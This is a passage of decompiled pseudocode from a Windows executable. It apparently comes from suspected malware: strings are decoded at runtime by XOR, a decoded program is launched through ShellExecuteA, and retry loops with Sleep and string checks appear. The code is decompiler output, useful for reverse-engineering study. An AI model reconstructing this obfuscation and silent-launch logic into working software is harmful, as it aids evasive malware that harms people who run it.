																																								_t1529 = E0040B190( &_v2708, _t918,  &_v844);
																																								_v24 = 0x3c;
																																								E0040B080( &_v676, _t919, "\"");
																																								_t1626 = _t1626 + 8;
																																								E00401DC0(_t1247,  &_v2708);
																																								_v24 = 0x3f;
																																								E00401DC0(_t1247,  &_v2636);
																																								_t923 = E00401D80( &_v676);
																																								ShellExecuteA(0, 0, E00408DE0(E00407DF0(_t1247, _t919, _t1579, _t1599)), _t923, 0, 0);
																																								_t927 =  &_v308;
																																								__imp__SHGetFolderPathA(0, 0, 0, 0, _t927);
																																								__eflags = _t927;
																																								if(_t927 >= 0) {
																																									_t931 = E00401E90( &_v2660, E00408E10(E00407E90(_t1529, _t1579, _t1599)));
																																									_v24 = 0x40;
																																									E0040B010( &_v628,  &_v308, _t931);
																																									_v24 = 0x42;
																																									E00401DC0(_t1247,  &_v2660);
																																									_t935 = E0040A140(E00407F30());
																																									_t936 = E00401D80( &_v628);
																																									_t937 = E00401D80( &_v844);
																																									E00404EB0(E00401D80( &_v844), _t937, _t936, _t935);
																																									_t1626 = _t1626 + 0xc;
																																									E00401DC0(_t1247,  &_v628);
																																								}
																																								_v24 = 0x36;
																																								E00401DC0(_t1247,  &_v676);
																																							}
																																						}
																																						L365:
																																						E00404CD0(_t1247, __eflags);
																																						L366:
																																						_t1600 = 0;
																																						_v2612 = 0;
																																						__eflags = 0;
																																						_v2584 = 1;
																																						_v580 = 0;
																																						do {
																																							_t907 =  *_t1579(E00401D80( &_v796), E00401D80( &_v652));
																																							_t1380 = _v2612;
																																							_t1626 = _t1626 + 8;
																																							_t1527 = _t907;
																																							_t908 = _v580;
																																							__eflags = _t1380;
																																							if(_t1380 != 0) {
																																								__eflags = _t1527;
																																								_t908 =  ==  ? _v2584 : _t908 & 0x000000ff;
																																								_v580 = _t908;
																																							}
																																							__eflags = _t1600 - 0xa;
																																							if(_t1600 >= 0xa) {
																																								__eflags = _t1527 - 1;
																																								_t908 =  !=  ? _v2584 : _t908 & 0x000000ff;
																																								_v580 = _t908;
																																							}
																																							__eflags = _t1600 - 0xf;
																																							if(_t1600 < 0xf) {
																																								_v580 = _t908;
																																								__eflags = _t1600 - 5;
																																								if(_t1600 < 5) {
																																									goto L377;
																																								}
																																								goto L375;
																																							} else {
																																								__eflags = _t1527 - 1;
																																								if(_t1527 == 1) {
																																									_v580 = _t1527;
																																								}
																																								L375:
																																								__eflags = _t1380;
																																								if(_t1380 != 0) {
																																									goto L377;
																																								}
																																								__eflags = _t1527 - 0xfffffffe;
																																								if(_t1527 == 0xfffffffe) {
																																									_t1579 = Sleep;
																																									Sleep(0x7d0);
																																									goto L355;
																																								}
																																							}
																																							L377:
																																							__eflags = _t1527 - 1;
																																							_t1382 =  ==  ? 1 : _t1380 & 0x000000ff;
																																							_t1600 = _t1600 + 1;
																																							_v2612 =  ==  ? 1 : _t1380 & 0x000000ff;
																																							Sleep(0x7d0);
																																							__eflags = _v580;
																																						} while (_v580 == 0);
																																						L354:
																																						_t1579 = Sleep;
																																						goto L355;
																																					}
																																					__eflags = _v2584;
																																					if(_v2584 != 0) {
																																						goto L355;
																																					}
																																					__eflags =  *0x43cd10;
																																					if( *0x43cd10 != 0) {
																																						goto L355;
																																					}
																																					asm("o16 nop [eax+eax]");
																																					do {
																																						_v580 = _t1595 + 1;
																																						_t946 = E00401E90( &_v676, E00408E60(E00407A70(_t1518, _t1579, _t1595 + 1)));
																																						_t1518 =  &_v748;
																																						_v24 = 0x26;
																																						_t947 = E0040B130( &_v628,  &_v748, _t946);
																																						_t1628 = _t1628 + 4;
																																						_v24 = 0x27;
																																						_t949 = E00401BF0(_t1247,  &_v1596, _t1579, E00401D80(_t947));
																																						E00401DC0(_t1247,  &_v628);
																																						_v24 = 0x23;
																																						E00401DC0(_t1247,  &_v676);
																																						__eflags = _t949;
																																						if(_t949 == 0) {
																																							goto L353;
																																						}
																																						_t1604 = E00401D00( &_v1596);
																																						_v2584 = _t1604;
																																						__eflags = _t1604 - 0x16;
																																						if(__eflags <= 0) {
																																							goto L353;
																																						}
																																						_push( ~(0 | __eflags > 0x00000000) | _t1604 + 0x00000001);
																																						_t1580 = E00414ABE();
																																						_t954 = E00401C30( &_v1596, _t953, _t1604 + 1);
																																						_push( ~(0 | __eflags > 0x00000000) | _v2584 * 0x00000002);
																																						_t957 = E00414ABE();
																																						_t1638 = _t1628 + 4 - 0x14;
																																						_v2584 = _t957;
																																						E0040A490(_t1247, _t1638, _v2584 * 2 >> 0x20, _t953,  &_v892);
																																						_push( &_v2584);
																																						_t1518 = E00403050(_t1247, _t953, _t954, _t1580);
																																						_t962 = E00402450(_v2584, _t961, __eflags,  &_v2612,  &_v2612);
																																						_t1626 = _t1638 + 0x24;
																																						_t1579 = _t962;
																																						__eflags = _v2612;
																																						if(_v2612 != 0) {
																																							goto L366;
																																						}
																																						L353:
																																						_t1595 = _v580;
																																						__eflags = _t1595 - 0xa;
																																					} while (_t1595 < 0xa);
																																					goto L354;
																																				}
																																				L345:
																																				 *_t1579(0xbb8);
																																			}
																																		} else {
																																			goto L336;
																																		}
																																	}
																																	_t963 =  *_t831 & 0x000000ff;
																																	__eflags = _t963 - 0x30;
																																	if(_t963 != 0x30) {
																																		asm("sbb eax, eax");
																																		_t964 = _t963 | 0x00000001;
																																		__eflags = _t964;
																																	} else {
																																		_t964 = 0;
																																	}
																																	__eflags = _t964;
																																	if(__eflags == 0) {
																																		goto L365;
																																	} else {
																																		goto L331;
																																	}
																																	L340:
																																	 *_t1579(0xbb8);
																																}
																															}
																															_t1332 = _v2636;
																															_t1519 = _t1515 + 1;
																															_t966 = _t1332;
																															__eflags = _t1519 - 0x1000;
																															if(_t1519 < 0x1000) {
																																goto L320;
																															}
																															_t1332 =  *((intOrPtr*)(_t1332 - 4));
																															_t1519 = _t1519 + 0x23;
																															__eflags = _t966 - _t1332 + 0xfffffffc - 0x1f;
																															if(__eflags <= 0) {
																																goto L320;
																															}
																															goto L319;
																														}
																														_t1429 = _v600;
																														_t1539 = _t1514 + 1;
																														_t969 = _t1429;
																														__eflags = _t1539 - 0x1000;
																														if(_t1539 < 0x1000) {
																															L315:
																															_push(_t1539);
																															E0040D5EF(_t1429);
																															_t1626 = _t1626 + 8;
																															goto L316;
																														}
																														_t1332 =  *((intOrPtr*)(_t1429 - 4));
																														_t1519 = _t1539 + 0x23;
																														__eflags = _t969 -  *((intOrPtr*)(_t1429 - 4)) + 0xfffffffc - 0x1f;
																														if(__eflags > 0) {
																															goto L319;
																														}
																														goto L315;
																													}
																													_t1430 = _v2660;
																													_t1540 = _t1513 + 1;
																													_t973 = _t1430;
																													__eflags = _t1540 - 0x1000;
																													if(_t1540 < 0x1000) {
																														L311:
																														_push(_t1540);
																														E0040D5EF(_t1430);
																														_t1626 = _t1626 + 8;
																														goto L312;
																													}
																													_t1332 =  *((intOrPtr*)(_t1430 - 4));
																													_t1519 = _t1540 + 0x23;
																													__eflags = _t973 -  *((intOrPtr*)(_t1430 - 4)) + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														goto L319;
																													}
																													goto L311;
																												}
																												_t1431 = _v2684;
																												_t1541 = _t1512 + 1;
																												_t977 = _t1431;
																												__eflags = _t1541 - 0x1000;
																												if(_t1541 < 0x1000) {
																													L307:
																													_push(_t1541);
																													E0040D5EF(_t1431);
																													_t1626 = _t1626 + 8;
																													goto L308;
																												}
																												_t1332 =  *((intOrPtr*)(_t1431 - 4));
																												_t1519 = _t1541 + 0x23;
																												__eflags = _t977 -  *((intOrPtr*)(_t1431 - 4)) + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L319;
																												}
																												goto L307;
																											}
																											_t1432 = _v628;
																											_t1542 = _t1511 + 1;
																											_t981 = _t1432;
																											__eflags = _t1542 - 0x1000;
																											if(_t1542 < 0x1000) {
																												L303:
																												_push(_t1542);
																												E0040D5EF(_t1432);
																												_t1626 = _t1626 + 8;
																												goto L304;
																											}
																											_t1332 =  *((intOrPtr*)(_t1432 - 4));
																											_t1519 = _t1542 + 0x23;
																											__eflags = _t981 -  *((intOrPtr*)(_t1432 - 4)) + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L319;
																											}
																											goto L303;
																										}
																										_t1433 = _v2608;
																										_t1543 = _t1510 + 1;
																										_t985 = _t1433;
																										__eflags = _t1543 - 0x1000;
																										if(_t1543 < 0x1000) {
																											L299:
																											_push(_t1543);
																											E0040D5EF(_t1433);
																											_t1626 = _t1626 + 8;
																											goto L300;
																										}
																										_t1332 =  *((intOrPtr*)(_t1433 - 4));
																										_t1519 = _t1543 + 0x23;
																										__eflags = _t985 -  *((intOrPtr*)(_t1433 - 4)) + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L319;
																										}
																										goto L299;
																									}
																									_t1434 = _v676;
																									_t1544 = _t1509 + 1;
																									_t989 = _t1434;
																									__eflags = _t1544 - 0x1000;
																									if(_t1544 < 0x1000) {
																										L295:
																										_push(_t1544);
																										E0040D5EF(_t1434);
																										_t1626 = _t1626 + 8;
																										goto L296;
																									}
																									_t1332 =  *((intOrPtr*)(_t1434 - 4));
																									_t1519 = _t1544 + 0x23;
																									__eflags = _t989 -  *((intOrPtr*)(_t1434 - 4)) + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L319;
																									}
																									goto L295;
																								}
																								_t1435 = _v2708;
																								_t1545 = _t1508 + 1;
																								_t993 = _t1435;
																								__eflags = _t1545 - 0x1000;
																								if(_t1545 < 0x1000) {
																									L291:
																									_push(_t1545);
																									E0040D5EF(_t1435);
																									_t1626 = _t1626 + 8;
																									goto L292;
																								}
																								_t1332 =  *((intOrPtr*)(_t1435 - 4));
																								_t1519 = _t1545 + 0x23;
																								__eflags = _t993 -  *((intOrPtr*)(_t1435 - 4)) + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L319;
																								}
																								goto L291;
																							} else {
																								_t1007 = 0;
																								__eflags = 0;
																								do {
																									 *(_t1007 + 0x43cf6c) =  *(_t1007 + 0x43cf6c) ^ 0x0000002e;
																									_t1007 = _t1007 + 1;
																									__eflags = _t1007 - 0xc;
																								} while (_t1007 < 0xc);
																								goto L272;
																							}
																						}
																						_t1014 =  *0x43ce78;
																						_v576 = 0x2e1a;
																						__eflags =  *0x43ce78 -  *((intOrPtr*)(_t1590 + 4));
																						if( *0x43ce78 >  *((intOrPtr*)(_t1590 + 4))) {
																							E0040D738(_t1014, 0x43ce78);
																							_t1620 = _t1620 + 4;
																							__eflags =  *0x43ce78 - 0xffffffff;
																							if(__eflags == 0) {
																								 *0x43cfac = _v576;
																								E0040DA4A(_t1310, __eflags, E0042B730);
																								E0040D6EE(0x43ce78);
																								_t1620 = _t1620 + 8;
																							}
																						}
																						_t1015 =  *0x43cfad;
																						__eflags = _t1015;
																						if(_t1015 != 0) {
																							 *0x43cfac =  *0x43cfac ^ 0x0000002e;
																							_t1032 = _t1015 ^ 0x0000002e;
																							__eflags = _t1032;
																							 *0x43cfad = _t1032;
																						}
																						_t1436 = 0x43cfac;
																						_v2608 = 0;
																						_v2592 = 0;
																						_v2588 = 0xf;
																						do {
																							_t1016 =  *_t1436;
																							_t1436 =  &(_t1436[1]);
																							__eflags = _t1016;
																						} while (_t1016 != 0);
																						_push(_t1436 - 0x43cfad);
																						_t1438 =  &_v2608;
																						E00402030( &_v2608, 0x43cfac);
																						_t1547 = _v632;
																						__eflags = _t1547 - 0x10;
																						if(_t1547 < 0x10) {
																							L253:
																							asm("movups xmm0, [ebp-0xa1c]");
																							_t1018 =  *0x43cd20;
																							_v580 = 0x5d5b;
																							asm("movups [ebp-0x278], xmm0");
																							_v573 = 0x2e;
																							asm("movq xmm0, [ebp-0xa0c]");
																							asm("movq [ebp-0x268], xmm0");
																							__eflags =  *0x43cd20 -  *((intOrPtr*)(_t1590 + 4));
																							if( *0x43cd20 >  *((intOrPtr*)(_t1590 + 4))) {
																								E0040D738(_t1018, 0x43cd20);
																								_t1620 = _t1620 + 4;
																								__eflags =  *0x43cd20 - 0xffffffff;
																								if(__eflags == 0) {
																									 *0x43cdd4 = _v580;
																									 *0x43cdd6 = _v573;
																									E0040DA4A(_t1438, __eflags, E0042B720);
																									E0040D6EE(0x43cd20);
																									_t1620 = _t1620 + 8;
																								}
																							}
																							_t1019 =  *0x43cdd6;
																							__eflags = _t1019;
																							if(_t1019 != 0) {
																								 *0x43cdd4 =  *0x43cdd4 ^ 0x0000002e;
																								 *0x43cdd5 =  *0x43cdd5 ^ 0x0000002e;
																								_t1022 = _t1019 ^ 0x0000002e;
																								__eflags = _t1022;
																								 *0x43cdd6 = _t1022;
																							}
																							_t1439 = 0x43cdd4;
																							_v2608 = 0;
																							_v2592 = 0;
																							_v2588 = 0xf;
																							do {
																								_t1020 =  *_t1439;
																								_t1439 =  &(_t1439[1]);
																								__eflags = _t1020;
																							} while (_t1020 != 0);
																							_t1440 = _t1439 - 0x43cdd5;
																							__eflags = _t1440;
																							_push(_t1440);
																							_push(0x43cdd4);
																							L261:
																							_t1310 =  &_v2608;
																							E00402030( &_v2608);
																							asm("movups xmm0, [ebp-0xa1c]");
																							asm("movups [ebp-0x2a8], xmm0");
																							asm("movq xmm0, [ebp-0xa0c]");
																							asm("movq [ebp-0x298], xmm0");
																							goto L262;
																						}
																						_t1438 = _v652;
																						_t1549 = _t1547 + 1;
																						_t1028 = _t1438;
																						__eflags = _t1549 - 0x1000;
																						if(_t1549 < 0x1000) {
																							L252:
																							_push(_t1549);
																							E0040D5EF(_t1438);
																							_t1620 = _t1620 + 8;
																							goto L253;
																						}
																						_t1332 =  *((intOrPtr*)(_t1438 - 4));
																						_t1519 = _t1549 + 0x23;
																						__eflags = _t1028 -  *((intOrPtr*)(_t1438 - 4)) + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L319;
																						}
																						goto L252;
																					}
																					_t1310 = _v2636;
																					_t1550 = _t1501 + 1;
																					_t1037 = _t1310;
																					__eflags = _t1550 - 0x1000;
																					if(_t1550 < 0x1000) {
																						L240:
																						_push(_t1550);
																						E0040D5EF(_t1310);
																						_t797 = _v580;
																						_t1620 = _t1620 + 8;
																						goto L241;
																					}
																					_t1332 =  *((intOrPtr*)(_t1310 - 4));
																					_t1519 = _t1550 + 0x23;
																					__eflags = _t1037 -  *((intOrPtr*)(_t1310 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L319;
																					}
																					goto L240;
																				}
																				_v576 = 0x2e1d;
																				__eflags =  *0x43cea4 - _t792;
																				if( *0x43cea4 > _t792) {
																					E0040D738(_t792, 0x43cea4);
																					_t1620 = _t1620 + 4;
																					__eflags =  *0x43cea4 - 0xffffffff;
																					if(__eflags == 0) {
																						 *0x43cefc = _v576;
																						E0040DA4A(_t1306, __eflags, E0042B760);
																						E0040D6EE(0x43cea4);
																						_t1620 = _t1620 + 8;
																					}
																				}
																				_t1047 =  *0x43cefd;
																				__eflags = _t1047;
																				if(_t1047 != 0) {
																					 *0x43cefc =  *0x43cefc ^ 0x0000002e;
																					_t1063 = _t1047 ^ 0x0000002e;
																					__eflags = _t1063;
																					 *0x43cefd = _t1063;
																				}
																				_t1441 = 0x43cefc;
																				_v2608 = 0;
																				_v2592 = 0;
																				_v2588 = 0xf;
																				do {
																					_t1048 =  *_t1441;
																					_t1441 =  &(_t1441[1]);
																					__eflags = _t1048;
																				} while (_t1048 != 0);
																				_push(_t1441 - 0x43cefd);
																				_t1443 =  &_v2608;
																				E00402030( &_v2608, 0x43cefc);
																				_t1552 = _v632;
																				__eflags = _t1552 - 0x10;
																				if(_t1552 < 0x10) {
																					L222:
																					asm("movups xmm0, [ebp-0xa1c]");
																					_t1050 =  *0x43ced0;
																					_v580 = 0x5b4b;
																					asm("movups [ebp-0x278], xmm0");
																					_v573 = 0x2e;
																					asm("movq xmm0, [ebp-0xa0c]");
																					asm("movq [ebp-0x268], xmm0");
																					__eflags =  *0x43ced0 -  *((intOrPtr*)(_t1590 + 4));
																					if( *0x43ced0 >  *((intOrPtr*)(_t1590 + 4))) {
																						E0040D738(_t1050, 0x43ced0);
																						_t1620 = _t1620 + 4;
																						__eflags =  *0x43ced0 - 0xffffffff;
																						if(__eflags == 0) {
																							 *0x43ce7c = _v580;
																							 *0x43ce7e = _v573;
																							E0040DA4A(_t1443, __eflags, E0042B750);
																							E0040D6EE(0x43ced0);
																							_t1620 = _t1620 + 8;
																						}
																					}
																					_t1051 =  *0x43ce7e;
																					__eflags = _t1051;
																					if(_t1051 != 0) {
																						 *0x43ce7c =  *0x43ce7c ^ 0x0000002e;
																						 *0x43ce7d =  *0x43ce7d ^ 0x0000002e;
																						_t1053 = _t1051 ^ 0x0000002e;
																						__eflags = _t1053;
																						 *0x43ce7e = _t1053;
																					}
																					_t1444 = 0x43ce7c;
																					_v2608 = 0;
																					_v2592 = 0;
																					_v2588 = 0xf;
																					do {
																						_t1052 =  *_t1444;
																						_t1444 =  &(_t1444[1]);
																						__eflags = _t1052;
																					} while (_t1052 != 0);
																					_push(_t1444 - 0x43ce7d);
																					_push(0x43ce7c);
																					goto L261;
																				}
																				_t1443 = _v652;
																				_t1554 = _t1552 + 1;
																				_t1059 = _t1443;
																				__eflags = _t1554 - 0x1000;
																				if(_t1554 < 0x1000) {
																					L221:
																					_push(_t1554);
																					E0040D5EF(_t1443);
																					_t1620 = _t1620 + 8;
																					goto L222;
																				}
																				_t1332 =  *((intOrPtr*)(_t1443 - 4));
																				_t1519 = _t1554 + 0x23;
																				__eflags = _t1059 -  *((intOrPtr*)(_t1443 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L319;
																				}
																				goto L221;
																			}
																			_t1306 = _v2636;
																			_t1555 = _t1499 + 1;
																			_t1068 = _t1306;
																			__eflags = _t1555 - 0x1000;
																			if(_t1555 < 0x1000) {
																				L209:
																				_push(_t1555);
																				E0040D5EF(_t1306);
																				_t1620 = _t1620 + 8;
																				goto L210;
																			}
																			_t1332 =  *((intOrPtr*)(_t1306 - 4));
																			_t1519 = _t1555 + 0x23;
																			__eflags = _t1068 -  *((intOrPtr*)(_t1306 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L319;
																			}
																			goto L209;
																		}
																		__eflags =  *((intOrPtr*)(_t1247 + 0x1c)) - 0x10;
																		_t1447 =  >=  ?  *(_t1247 + 8) : _t1247 + 8;
																		_v573 =  *((intOrPtr*)(_t1247 + 0x1c)) - 0x10 >= 0;
																		_t1078 = E00402180( >=  ?  *(_t1247 + 8) : _t1247 + 8,  *((intOrPtr*)(_t1247 + 0x18)),  >=  ?  *(_t1247 + 8) : _t1247 + 8, "mixtwo", 6);
																		_t1620 = _t1620 + 0xc;
																		__eflags = _t1078 - 0xffffffff;
																		if(_t1078 != 0xffffffff) {
																			L180:
																			_t1079 =  *0x43cef4;
																			_v584 = 0x41564743;
																			_v580 = 0x4b40;
																			_v573 = 0x2e;
																			__eflags =  *0x43cef4 -  *((intOrPtr*)(_t1590 + 4));
																			if( *0x43cef4 >  *((intOrPtr*)(_t1590 + 4))) {
																				E0040D738(_t1079, 0x43cef4);
																				_t1620 = _t1620 + 4;
																				__eflags =  *0x43cef4 - 0xffffffff;
																				if(__eflags == 0) {
																					 *0x43cec0 = _v584;
																					 *0x43cec4 = _v580;
																					 *0x43cec6 = _v573;
																					E0040DA4A(_t1447, __eflags, E0042B7C0);
																					E0040D6EE(0x43cef4);
																					_t1620 = _t1620 + 8;
																				}
																			}
																			_t1080 =  *0x43cec6;
																			__eflags = _t1080;
																			if(_t1080 != 0) {
																				 *0x43cec0 =  *0x43cec0 ^ 0x0000002e;
																				 *0x43cec1 =  *0x43cec1 ^ 0x0000002e;
																				 *0x43cec2 =  *0x43cec2 ^ 0x0000002e;
																				 *0x43cec3 =  *0x43cec3 ^ 0x0000002e;
																				 *0x43cec4 =  *0x43cec4 ^ 0x0000002e;
																				 *0x43cec5 =  *0x43cec5 ^ 0x0000002e;
																				_t1096 = _t1080 ^ 0x0000002e;
																				__eflags = _t1096;
																				 *0x43cec6 = _t1096;
																			}
																			_t1448 = 0x43cec0;
																			_v2608 = 0;
																			_v2592 = 0;
																			_v2588 = 0xf;
																			do {
																				_t1081 =  *_t1448;
																				_t1448 =  &(_t1448[1]);
																				__eflags = _t1081;
																			} while (_t1081 != 0);
																			_push(_t1448 - 0x43cec1);
																			E00402030( &_v2608, 0x43cec0);
																			asm("movups xmm0, [ebp-0xa1c]");
																			_t1083 =  *0x43ced4;
																			_v576 = 0x2e1f;
																			asm("movups [ebp-0x2a8], xmm0");
																			asm("movq xmm0, [ebp-0xa0c]");
																			asm("movq [ebp-0x298], xmm0");
																			__eflags =  *0x43ced4 -  *((intOrPtr*)(_t1590 + 4));
																			if( *0x43ced4 >  *((intOrPtr*)(_t1590 + 4))) {
																				E0040D738(_t1083, 0x43ced4);
																				_t1620 = _t1620 + 4;
																				__eflags =  *0x43ced4 - 0xffffffff;
																				if(__eflags == 0) {
																					 *0x43cf90 = _v576;
																					E0040DA4A( &_v2608, __eflags, E0042B7B0);
																					E0040D6EE(0x43ced4);
																					_t1620 = _t1620 + 8;
																				}
																			}
																			_t1084 =  *0x43cf91;
																			__eflags = _t1084;
																			if(_t1084 != 0) {
																				 *0x43cf90 =  *0x43cf90 ^ 0x0000002e;
																				_t1091 = _t1084 ^ 0x0000002e;
																				__eflags = _t1091;
																				 *0x43cf91 = _t1091;
																			}
																			_t1451 = 0x43cf90;
																			_v2608 = 0;
																			_v2592 = 0;
																			_v2588 = 0xf;
																			do {
																				_t1085 =  *_t1451;
																				_t1451 =  &(_t1451[1]);
																				__eflags = _t1085;
																			} while (_t1085 != 0);
																			_push(_t1451 - 0x43cf91);
																			_t1310 =  &_v2608;
																			E00402030( &_v2608, 0x43cf90);
																			_t1559 = _v632;
																			__eflags = _t1559 - 0x10;
																			if(_t1559 < 0x10) {
																				L198:
																				asm("movups xmm0, [ebp-0xa1c]");
																				asm("movups [ebp-0x278], xmm0");
																				asm("movq xmm0, [ebp-0xa0c]");
																				asm("movq [ebp-0x268], xmm0");
																				goto L262;
																			}
																			_t1310 = _v652;
																			_t1560 = _t1559 + 1;
																			_t1087 = _t1310;
																			__eflags = _t1560 - 0x1000;
																			if(_t1560 < 0x1000) {
																				L197:
																				_push(_t1560);
																				E0040D5EF(_t1310);
																				_t1620 = _t1620 + 8;
																				goto L198;
																			}
																			_t1332 =  *((intOrPtr*)(_t1310 - 4));
																			_t1519 = _t1560 + 0x23;
																			__eflags = _t1087 -  *((intOrPtr*)(_t1310 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L319;
																			}
																			goto L197;
																		}
																		__eflags = _v573;
																		_t1447 =  !=  ?  *(_t1247 + 8) : _t1247 + 8;
																		_t1103 = E00402180( !=  ?  *(_t1247 + 8) : _t1247 + 8,  *((intOrPtr*)(_t1247 + 0x18)),  !=  ?  *(_t1247 + 8) : _t1247 + 8, "mixnull", 7);
																		_t1620 = _t1620 + 0xc;
																		__eflags = _t1103 - 0xffffffff;
																		if(_t1103 != 0xffffffff) {
																			goto L180;
																		}
																		__eflags = _v573;
																		_t1447 =  !=  ?  *(_t1247 + 8) : _t1247 + 8;
																		_t1104 = E00402180( !=  ?  *(_t1247 + 8) : _t1247 + 8,  *((intOrPtr*)(_t1247 + 0x18)),  !=  ?  *(_t1247 + 8) : _t1247 + 8, "mixazed", 7);
																		_t1620 = _t1620 + 0xc;
																		__eflags = _t1104 - 0xffffffff;
																		if(_t1104 != 0xffffffff) {
																			goto L180;
																		}
																		_t1105 =  *0x43cf68;
																		_v584 = 0x5a564743;
																		_v580 = 0x4159;
																		_v573 = 0x2e;
																		__eflags =  *0x43cf68 -  *((intOrPtr*)(_t1590 + 4));
																		if( *0x43cf68 >  *((intOrPtr*)(_t1590 + 4))) {
																			E0040D738(_t1105, 0x43cf68);
																			_t1620 = _t1620 + 4;
																			__eflags =  *0x43cf68 - 0xffffffff;
																			if(__eflags == 0) {
																				 *0x43ce60 = _v584;
																				 *0x43ce64 = _v580;
																				 *0x43ce66 = _v573;
																				E0040DA4A(_t1447, __eflags, E0042B790);
																				E0040D6EE(0x43cf68);
																				_t1620 = _t1620 + 8;
																			}
																		}
																		_t1106 =  *0x43ce66;
																		__eflags = _t1106;
																		if(_t1106 != 0) {
																			 *0x43ce60 =  *0x43ce60 ^ 0x0000002e;
																			 *0x43ce61 =  *0x43ce61 ^ 0x0000002e;
																			 *0x43ce62 =  *0x43ce62 ^ 0x0000002e;
																			 *0x43ce63 =  *0x43ce63 ^ 0x0000002e;
																			 *0x43ce64 =  *0x43ce64 ^ 0x0000002e;
																			 *0x43ce65 =  *0x43ce65 ^ 0x0000002e;
																			_t1122 = _t1106 ^ 0x0000002e;
																			__eflags = _t1122;
																			 *0x43ce66 = _t1122;
																		}
																		_t1455 = 0x43ce60;
																		_v2608 = 0;
																		_v2592 = 0;
																		_v2588 = 0xf;
																		do {
																			_t1107 =  *_t1455;
																			_t1455 =  &(_t1455[1]);
																			__eflags = _t1107;
																		} while (_t1107 != 0);
																		_push(_t1455 - 0x43ce61);
																		E00402030( &_v2608, 0x43ce60);
																		asm("movups xmm0, [ebp-0xa1c]");
																		_t1109 =  *0x43ce4c;
																		_v576 = 0x2e1c;
																		asm("movups [ebp-0x2a8], xmm0");
																		asm("movq xmm0, [ebp-0xa0c]");
																		asm("movq [ebp-0x298], xmm0");
																		__eflags =  *0x43ce4c -  *((intOrPtr*)(_t1590 + 4));
																		if( *0x43ce4c >  *((intOrPtr*)(_t1590 + 4))) {
																			E0040D738(_t1109, 0x43ce4c);
																			_t1620 = _t1620 + 4;
																			__eflags =  *0x43ce4c - 0xffffffff;
																			if(__eflags == 0) {
																				 *0x43ce2c = _v576;
																				E0040DA4A( &_v2608, __eflags, E0042B780);
																				E0040D6EE(0x43ce4c);
																				_t1620 = _t1620 + 8;
																			}
																		}
																		_t1110 =  *0x43ce2d;
																		__eflags = _t1110;
																		if(_t1110 != 0) {
																			 *0x43ce2c =  *0x43ce2c ^ 0x0000002e;
																			_t1117 = _t1110 ^ 0x0000002e;
																			__eflags = _t1117;
																			 *0x43ce2d = _t1117;
																		}
																		_t1458 = 0x43ce2c;
																		_v2608 = 0;
																		_v2592 = 0;
																		_v2588 = 0xf;
																		do {
																			_t1111 =  *_t1458;
																			_t1458 =  &(_t1458[1]);
																			__eflags = _t1111;
																		} while (_t1111 != 0);
																		_push(_t1458 - 0x43ce2d);
																		_t1310 =  &_v2608;
																		E00402030( &_v2608, 0x43ce2c);
																		_t1565 = _v632;
																		__eflags = _t1565 - 0x10;
																		if(_t1565 < 0x10) {
																			goto L198;
																		}
																		_t1310 = _v652;
																		_t1566 = _t1565 + 1;
																		_t1113 = _t1310;
																		__eflags = _t1566 - 0x1000;
																		if(_t1566 < 0x1000) {
																			L179:
																			_push(_t1566);
																			E0040D5EF(_t1310);
																			asm("movups xmm0, [ebp-0xa1c]");
																			_t1620 = _t1620 + 8;
																			asm("movups [ebp-0x278], xmm0");
																			asm("movq xmm0, [ebp-0xa0c]");
																			asm("movq [ebp-0x268], xmm0");
																			goto L262;
																		}
																		_t1332 =  *((intOrPtr*)(_t1310 - 4));
																		_t1519 = _t1566 + 0x23;
																		__eflags = _t1113 -  *((intOrPtr*)(_t1310 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L319;
																		}
																		goto L179;
																	}
																	_t1302 = _v2636;
																	_t1567 = _t1497 + 1;
																	_t1129 = _t1302;
																	__eflags = _t1567 - 0x1000;
																	if(_t1567 < 0x1000) {
																		L157:
																		_push(_t1567);
																		E0040D5EF(_t1302);
																		_t785 = _v580;
																		_t1620 = _t1620 + 8;
																		goto L158;
																	}
																	_t1332 =  *((intOrPtr*)(_t1302 - 4));
																	_t1519 = _t1567 + 0x23;
																	__eflags = _t1129 -  *((intOrPtr*)(_t1302 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L319;
																	}
																	goto L157;
																}
																_t1298 = _v2660;
																_t1568 = _t1495 + 1;
																_t1138 = _t1298;
																__eflags = _t1568 - 0x1000;
																if(_t1568 < 0x1000) {
																	L146:
																	_push(_t1568);
																	E0040D5EF(_t1298);
																	_t1620 = _t1620 + 8;
																	goto L147;
																}
																_t1332 =  *((intOrPtr*)(_t1298 - 4));
																_t1519 = _t1568 + 0x23;
																__eflags = _t1138 -  *((intOrPtr*)(_t1298 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L319;
																}
																goto L146;
															}
															_t1460 = _v2660;
															_t1569 = _t1493 + 1;
															_t1142 = _t1460;
															__eflags = _t1569 - 0x1000;
															if(_t1569 < 0x1000) {
																L142:
																_push(_t1569);
																E0040D5EF(_t1460);
																_t1620 = _t1620 + 8;
																goto L143;
															}
															_t1332 =  *((intOrPtr*)(_t1460 - 4));
															_t1519 = _t1569 + 0x23;
															__eflags = _t1142 -  *((intOrPtr*)(_t1460 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L319;
															}
															goto L142;
														} else {
															asm("movups xmm0, [0x43cdfc]");
															_t1146 = 0x10;
															asm("movaps xmm1, [0x437d50]");
															asm("pxor xmm1, xmm0");
															asm("movups [0x43cdfc], xmm1");
															asm("o16 nop [eax+eax]");
															do {
																 *(_t1146 + 0x43cdfc) =  *(_t1146 + 0x43cdfc) ^ 0x0000002e;
																_t1146 = _t1146 + 1;
																__eflags = _t1146 - 0x1a;
															} while (_t1146 < 0x1a);
															goto L137;
														}
													} else {
														_t1151 = 0;
														asm("o16 nop [eax+eax]");
														do {
